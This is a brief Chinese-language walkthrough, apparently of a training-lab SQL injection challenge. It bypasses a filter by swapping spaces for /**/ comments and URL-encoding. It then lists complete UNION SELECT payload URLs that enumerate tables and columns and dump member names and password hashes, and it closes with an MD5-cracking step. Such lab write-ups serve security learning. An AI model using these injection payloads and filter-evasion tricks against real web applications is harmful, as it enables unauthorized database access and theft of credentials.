墨者學習
By/shy014
- 進去首頁又看到熟悉的公告
- 通過簡單的測試,確定存在sql注入漏洞,但是輸入and 1=1 ,and 1=2,order by,union select ,and都沒有反應。
- 經過嘗試,用/**/代替空格,然後將URL進行URL編碼就可以繞過
- 確定有4個字段
5,確定回顯位置
- 確定當前數據庫和用戶
http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,database(),user(),4#
6,確定當前數據庫中的表名(庫名要用hex編碼 直接使用database()我沒成功)
http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,group_concat(table_name),version(),4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x6d6f7a68655f64697363757a5f73746f726d67726f7570
7,確定表中的字段名
http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,group_concat(column_name),version(),4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x73746f726d67726f75705f6d656d626572
8,確定字段的值
http://219.153.49.228:46365/new_list.php
?id=2/**/union/**/select/**/1,group_concat(id,name,password),version(),4/**/from/**/stormgroup_member
9.破解MD5 登陸獲得key